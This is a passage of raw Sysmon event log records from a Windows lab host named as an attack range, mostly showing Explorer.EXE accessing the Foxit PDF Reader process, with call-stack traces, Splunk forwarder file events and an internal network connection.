(x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+13012a(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\System32\SHELL32.dll+109200(wow64)|C:\Windows\System32\SHELL32.dll+109136(wow64)|C:\Windows\System32\SHELL32.dll+1092c2(wow64)|C:\Windows\system32\explorerframe.dll+4b1ba(wow64)|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+d30a(wow64) 10341000x800000000000000040462Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:22.399{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+130113(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\System32\SHELL32.dll+109200(wow64)|C:\Windows\System32\SHELL32.dll+109136(wow64) 10341000x800000000000000040461Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:22.399{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+130113(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\System32\SHELL32.dll+109200(wow64)|C:\Windows\System32\SHELL32.dll+109136(wow64)|C:\Windows\System32\SHELL32.dll+1092c2(wow64) 23542300x800000000000000040460Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:22.282{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A2FCCA881FFAC518662D308F25B0A86,SHA256=919A72B1BD6CFA12EE9DC4C9BD3160526CBFBFFBEFFC337DB6865BEEB536E35F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000040459Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:22.140{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEFEAE5)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+11214|C:\Windows\System32\wow64win.dll+31ed0|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+363dd|C:\Windows\SYSTEM32\ntdll.dll+a9834|C:\Windows\System32\wow64win.dll+f534|C:\Windows\System32\wow64win.dll+4e07 10341000x800000000000000040458Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:22.140{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1301b1(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\system32\explorerframe.dll+7d5a5(wow64)|C:\Windows\system32\explorerframe.dll+7d526(wow64)|C:\Windows\system32\explorerframe.dll+7ee52(wow64)|C:\Windows\system32\explorerframe.dll+9217c(wow64)|C:\Windows\system32\explorerframe.dll+8eecd(wow64)|C:\Windows\System32\COMDLG32.dll+3460f(wow64) 10341000x800000000000000040457Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:22.140{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+13012a(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\system32\explorerframe.dll+7d5a5(wow64)|C:\Windows\system32\explorerframe.dll+7d526(wow64)|C:\Windows\system32\explorerframe.dll+7ee52(wow64)|C:\Windows\system32\explorerframe.dll+9217c(wow64)|C:\Windows\system32\explorerframe.dll+8eecd(wow64)|C:\Windows\System32\COMDLG32.dll+3460f(wow64) 10341000x800000000000000040456Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:22.140{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+130113(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\system32\explorerframe.dll+7d5a5(wow64)|C:\Windows\system32\explorerframe.dll+7d526(wow64) 10341000x800000000000000040455Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:22.140{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+130113(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\system32\explorerframe.dll+7d5a5(wow64)|C:\Windows\system32\explorerframe.dll+7d526(wow64)|C:\Windows\system32\explorerframe.dll+7ee52(wow64) 10341000x800000000000000040454Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:22.124{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEFEAE5)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+11214|C:\Windows\System32\wow64win.dll+31ed0|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+363dd|C:\Windows\SYSTEM32\ntdll.dll+a9834|C:\Windows\System32\wow64win.dll+f534|C:\Windows\System32\wow64win.dll+4e07 10341000x800000000000000040453Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:22.124{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1fc75f(wow64)|C:\Windows\System32\windows.storage.dll+1fc626(wow64)|C:\Windows\System32\windows.storage.dll+1fc4a8(wow64)|C:\Windows\System32\windows.storage.dll+1fc37b(wow64)|C:\Windows\System32\windows.storage.dll+1fc115(wow64)|C:\Windows\System32\windows.storage.dll+19781e(wow64)|C:\Windows\System32\windows.storage.dll+198b76(wow64)|C:\Windows\System32\windows.storage.dll+19927d(wow64)|C:\Windows\system32\explorerframe.dll+65aad(wow64)|C:\Windows\system32\explorerframe.dll+65dfa(wow64)|C:\Windows\system32\explorerframe.dll+96782(wow64) 10341000x800000000000000040452Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:22.124{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1fc6ae(wow64)|C:\Windows\System32\windows.storage.dll+1fc626(wow64)|C:\Windows\System32\windows.storage.dll+1fc4a8(wow64)|C:\Windows\System32\windows.storage.dll+1fc37b(wow64)|C:\Windows\System32\windows.storage.dll+1fc115(wow64)|C:\Windows\System32\windows.storage.dll+19781e(wow64)|C:\Windows\System32\windows.storage.dll+198b76(wow64)|C:\Windows\System32\windows.storage.dll+19927d(wow64)|C:\Windows\system32\explorerframe.dll+65aad(wow64)|C:\Windows\system32\explorerframe.dll+65dfa(wow64)|C:\Windows\system32\explorerframe.dll+96782(wow64) 10341000x800000000000000040451Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:22.124{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1fc697(wow64)|C:\Windows\System32\windows.storage.dll+1fc626(wow64)|C:\Windows\System32\windows.storage.dll+1fc4a8(wow64)|C:\Windows\System32\windows.storage.dll+1fc37b(wow64)|C:\Windows\System32\windows.storage.dll+1fc115(wow64)|C:\Windows\System32\windows.storage.dll+19781e(wow64)|C:\Windows\System32\windows.storage.dll+198b76(wow64) 10341000x800000000000000040450Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:22.124{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1fc697(wow64)|C:\Windows\System32\windows.storage.dll+1fc626(wow64)|C:\Windows\System32\windows.storage.dll+1fc4a8(wow64)|C:\Windows\System32\windows.storage.dll+1fc37b(wow64)|C:\Windows\System32\windows.storage.dll+1fc115(wow64)|C:\Windows\System32\windows.storage.dll+19781e(wow64)|C:\Windows\System32\windows.storage.dll+198b76(wow64)|C:\Windows\System32\windows.storage.dll+19927d(wow64) 354300x800000000000000040470Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:21.705{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56248-false10.0.1.12-8000- 23542300x800000000000000040469Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:23.355{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EDBAE878639163918BAA5D74FB22AA04,SHA256=00FEDD6C2A638A46140A15EF9E13A8572DEEB8713D9A59A60E7956AF14F24F87,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000040482Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:24.851{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEFEAE5)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+11214|C:\Windows\System32\wow64win.dll+31ed0|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+363dd|C:\Windows\SYSTEM32\ntdll.dll+a9834|C:\Windows\System32\wow64win.dll+f534|C:\Windows\System32\wow64win.dll+4e07 10341000x800000000000000040481Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:24.851{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1301b1(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\system32\explorerframe.dll+7d5a5(wow64)|C:\Windows\system32\explorerframe.dll+7d526(wow64)|C:\Windows\system32\explorerframe.dll+7ee52(wow64)|C:\Windows\system32\explorerframe.dll+9217c(wow64)|C:\Windows\system32\explorerframe.dll+8eecd(wow64)|C:\Windows\System32\COMDLG32.dll+3460f(wow64) 10341000x800000000000000040480Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:24.851{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+13012a(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\system32\explorerframe.dll+7d5a5(wow64)|C:\Windows\system32\explorerframe.dll+7d526(wow64)|C:\Windows\system32\explorerframe.dll+7ee52(wow64)|C:\Windows\system32\explorerframe.dll+9217c(wow64)|C:\Windows\system32\explorerframe.dll+8eecd(wow64)|C:\Windows\System32\COMDLG32.dll+3460f(wow64) 10341000x800000000000000040479Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:24.851{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+130113(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\system32\explorerframe.dll+7d5a5(wow64)|C:\Windows\system32\explorerframe.dll+7d526(wow64) 10341000x800000000000000040478Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:24.851{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF 